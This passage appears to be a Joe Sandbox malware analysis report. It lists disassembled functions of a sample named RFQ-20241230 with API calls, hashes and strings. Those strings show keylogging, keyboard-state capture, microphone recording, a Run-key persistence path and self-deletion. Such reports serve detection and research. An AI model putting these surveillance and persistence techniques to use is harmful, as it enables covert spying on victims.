                            • GetSystemMetrics.USER32(0000004E), ref: 00418535
                            • GetSystemMetrics.USER32(0000004F), ref: 0041853B
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: MetricsSystem
                            • String ID:
                            • API String ID: 4116985748-0
                            • Opcode ID: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                            • Instruction ID: f480d68fafb364c29fc67a5f666d93eee18e0abee54110dfc95006384cbaadd6
                            • Opcode Fuzzy Hash: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                            • Instruction Fuzzy Hash: 72F0D672B043256BCA00EA7A4C4156FAB97DFC46A4F25083FE6059B341DE78EC4647D9
                            Function 0041B38D Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                            Download Yara Rule
                            APIs
                            • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                            • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3E3
                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3EB
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleOpenProcess
                            • String ID:
                            • API String ID: 39102293-0
                            • Opcode ID: 5115dc8d21cc8ae304c84a9c6d3d66be3b1fde84125eb931853a25931357237b
                            • Instruction ID: d8943217945b3e3bc9c1dbf33fc4ac7f726da2cd485b5cd5dbfa96192dfeb6c9
                            • Opcode Fuzzy Hash: 5115dc8d21cc8ae304c84a9c6d3d66be3b1fde84125eb931853a25931357237b
                            • Instruction Fuzzy Hash: 67F04971204209ABD3026794AC4AFEBB26CDF44B96F000037FA11D22A2FF74CCC146A9
                            Function 00441EED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                            Download Yara Rule
                            APIs
                            • __startOneArgErrorHandling.LIBCMT ref: 00441F7D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorHandling__start
                            • String ID: pow
                            • API String ID: 3213639722-2276729525
                            • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                            • Instruction ID: b0758be5652a64c1ac5d647a76b92dde9bac1040a8da8be5e5c84d6172790ea5
                            • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                            • Instruction Fuzzy Hash: E6515A61A0A20296F7117B14C98136F6B949B50741F288D6BF085823F9EF3DCCDB9A4E
                            Function 00420F7E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memcmp
                            • String ID: 4[G$4[G
                            • API String ID: 2931989736-4028565467
                            • Opcode ID: c0cf07660e95b0ee548887709ac0c844436c6f626d7fb978308fdfb467b77264
                            • Instruction ID: 33b36a833443cc607bae0a2c4f054eab59dd7b99d1d8389eb50a0704093c1055
                            • Opcode Fuzzy Hash: c0cf07660e95b0ee548887709ac0c844436c6f626d7fb978308fdfb467b77264
                            • Instruction Fuzzy Hash: E56110716047069AC714DF28D8406B3B7A8FF98304F44063EEC5D8F656E778AA25CBAD
                            Function 00414B9B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CountEventTick
                            • String ID: >G
                            • API String ID: 180926312-1296849874
                            • Opcode ID: f703b500cb05a13244301c0645b6086ff7a6bd2c3e191b326370292c0f426d94
                            • Instruction ID: 080f125417303e5552765b07387c73e695832f87024c8a27cfac38d5c25ddd71
                            • Opcode Fuzzy Hash: f703b500cb05a13244301c0645b6086ff7a6bd2c3e191b326370292c0f426d94
                            • Instruction Fuzzy Hash: 7E5191315042409AC224FB71D8A2AEF73E5AFD1314F40853FF94A671E2EF389949C69E
                            Function 0044DB44 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                            Download Yara Rule
                            APIs
                            • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB69
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Info
                            • String ID: $vD
                            • API String ID: 1807457897-3636070802
                            • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                            • Instruction ID: 639e137743dbd1cdb094e6b6e994140176401b7572b89e22c1ac552797110b95
                            • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                            • Instruction Fuzzy Hash: 6A411C709043889AEF218F24CCC4AF6BBF9DF45308F1404EEE58A87242D279AA45DF65
                            Function 004508EE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B49,?,00000050,?,?,?,?,?), ref: 004509C9
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ACP$OCP
                            • API String ID: 0-711371036
                            • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                            • Instruction ID: 0ee4350655218b6c75cd3052c0190142cf4d5733969cac988e1a0851f3347a37
                            • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                            • Instruction Fuzzy Hash: 832148EBA00100A6F7308F55C801B9773AAAB90B23F564426EC49D730BF73ADE08C358
                            Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                            Strings
                            • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: LocalTime
                            • String ID: KeepAlive | Enabled | Timeout:
                            • API String ID: 481472006-1507639952
                            • Opcode ID: 55e8a268f478e9dd55dcba40bfbb0b748b5ff50574cd289cd160118e090ea358
                            • Instruction ID: 8fc2066b5dd234cef981570443e677007340a491061b3c72667858eadfbc0999
                            • Opcode Fuzzy Hash: 55e8a268f478e9dd55dcba40bfbb0b748b5ff50574cd289cd160118e090ea358
                            • Instruction Fuzzy Hash: EF2129A1A042806BC310FB6A980676B7B9457D1315F48417EF948532E2EB3C5999CB9F
                            Function 0041A696 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: LocalTime
                            • String ID: | $%02i:%02i:%02i:%03i
                            • API String ID: 481472006-2430845779
                            • Opcode ID: d3ffcd1d0ca88ff003ebf63de90cbb52a1477b8a5ce084a0fda1429b811f37a5
                            • Instruction ID: f196d4ed1927782274832919bda13c77b2b6189c6c06a517aeeeb96a95a688aa
                            • Opcode Fuzzy Hash: d3ffcd1d0ca88ff003ebf63de90cbb52a1477b8a5ce084a0fda1429b811f37a5
                            • Instruction Fuzzy Hash: 81114C725082045AC704EBA5D8568AF73E8EB94708F10053FFC85931E1EF38DA84C69E
                            Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                            • CloseHandle.KERNEL32(?), ref: 0040A7CA
                            • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                            • String ID: Online Keylogger Stopped
                            • API String ID: 1623830855-1496645233
                            • Opcode ID: 441e50180230ba2ba05f386e367c5a536ce2e77025d1c3492b7828fca42d8fe8
                            • Instruction ID: 9ca866747e1af720c58b6b078daeda0145c7b5fd7bd766bf2ea1503866da158c
                            • Opcode Fuzzy Hash: 441e50180230ba2ba05f386e367c5a536ce2e77025d1c3492b7828fca42d8fe8
                            • Instruction Fuzzy Hash: 8101D431A043019BDB25BB35C80B7AEBBB19B45315F40407FE481275D2EB7999A6C3DB
                            Function 004016E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                            Download Yara Rule
                            APIs
                            • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B90,00473EE8,?,00000000,00401913), ref: 00401747
                            • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: wave$BufferHeaderPrepare
                            • String ID: T=G
                            • API String ID: 2315374483-379896819
                            • Opcode ID: 8fbe103bd9222016c2b4e2bc3eb0eb996b4ad057f7b910ac6b5a0adda4e0e2aa
                            • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                            • Opcode Fuzzy Hash: 8fbe103bd9222016c2b4e2bc3eb0eb996b4ad057f7b910ac6b5a0adda4e0e2aa
                            • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                            Function 004477A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • IsValidLocale.KERNEL32(00000000,z=D,00000000,00000001,?,?,00443D7A,?,?,?,?,00000004), ref: 004477EC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: LocaleValid
                            • String ID: IsValidLocaleName$z=D
                            • API String ID: 1901932003-2791046955
                            • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                            • Instruction ID: b87742f2873dd73c0a7d5aade023b210d3410e3306d67f57874115e62e910f2b
                            • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                            • Instruction Fuzzy Hash: 72F0E930A45318F7DA106B659C06F5E7B54CF05711F50807BFD046A283CE796D0285DC
                            Function 00401D91 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID: T=G$T=G
                            • API String ID: 3519838083-3732185208
                            • Opcode ID: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
                            • Instruction ID: f0e76400c825ed045590d0aed9209fb7c3a86c2d0af9b05bbbbea7315d156e8c
                            • Opcode Fuzzy Hash: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
                            • Instruction Fuzzy Hash: 77F0E971A00221ABC714BB65C80569EB774EF4136DF10827FB416B72E1CBBD5D04D65D
                            Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • GetKeyState.USER32(00000011), ref: 0040AD5B
                              • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                              • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                              • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                              • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                              • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                            • String ID: [AltL]$[AltR]
                            • API String ID: 2738857842-2658077756
                            • Opcode ID: 3060760f9439b7e306d49c13d8f75930fa0495ce116598ddfd2946cd15ffa226
                            • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                            • Opcode Fuzzy Hash: 3060760f9439b7e306d49c13d8f75930fa0495ce116598ddfd2946cd15ffa226
                            • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                            Function 00448813 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 00448835
                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorFreeHeapLast_free
                            • String ID: `@$`@
                            • API String ID: 1353095263-20545824
                            • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                            • Instruction ID: fd413ccac38a9f67c3de8d393d9e933a11814297f80871467d1a397382efd299
                            • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                            • Instruction Fuzzy Hash: 4DE06D371006059F8720DE6DD400A86B7E5EF95720720852AE89DE3710D731E812CB40
                            Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • GetKeyState.USER32(00000012), ref: 0040ADB5
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: State
                            • String ID: [CtrlL]$[CtrlR]
                            • API String ID: 1649606143-2446555240
                            • Opcode ID: 5e7418163892c1745ec9138d14110a374d5f1712bd724f4894496e05d56ee1c7
                            • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                            • Opcode Fuzzy Hash: 5e7418163892c1745ec9138d14110a374d5f1712bd724f4894496e05d56ee1c7
                            • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                            Function 0041297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                            • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                            Strings
                            • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteOpenValue
                            • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                            • API String ID: 2654517830-1051519024
                            • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                            • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                            • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                            • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                            Function 0040AF77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                            Download Yara Rule
                            APIs
                            • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                            • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteDirectoryFileRemove
                            • String ID: pth_unenc
                            • API String ID: 3325800564-4028850238
                            • Opcode ID: b9b9920c625181ca6de104178518fd5ce2cfe10458045dbf61cc06549d32ecb0
                            • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                            • Opcode Fuzzy Hash: b9b9920c625181ca6de104178518fd5ce2cfe10458045dbf61cc06549d32ecb0
                            • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                            Function 00411699 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                            • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ObjectProcessSingleTerminateWait
                            • String ID: pth_unenc
                            • API String ID: 1872346434-4028850238
                            • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                            • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                            • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                            • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                            Function 0043FA6E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FB04
                            • GetLastError.KERNEL32 ref: 0043FB12
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB6D
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID:
                            • API String ID: 1717984340-0
                            • Opcode ID: 87fd12a014d32a69e1321f94067b17621f6fc27d46547f6ea495f007f72d0054
                            • Instruction ID: 94dc36b571f96c0084dd62d2177e44ea0606df48237064e9d41db09688609199
                            • Opcode Fuzzy Hash: 87fd12a014d32a69e1321f94067b17621f6fc27d46547f6ea495f007f72d0054
                            • Instruction Fuzzy Hash: 66413870E00206AFCF219F64C854A6BF7A9EF09320F1451BBF8585B2A1E738AC09C759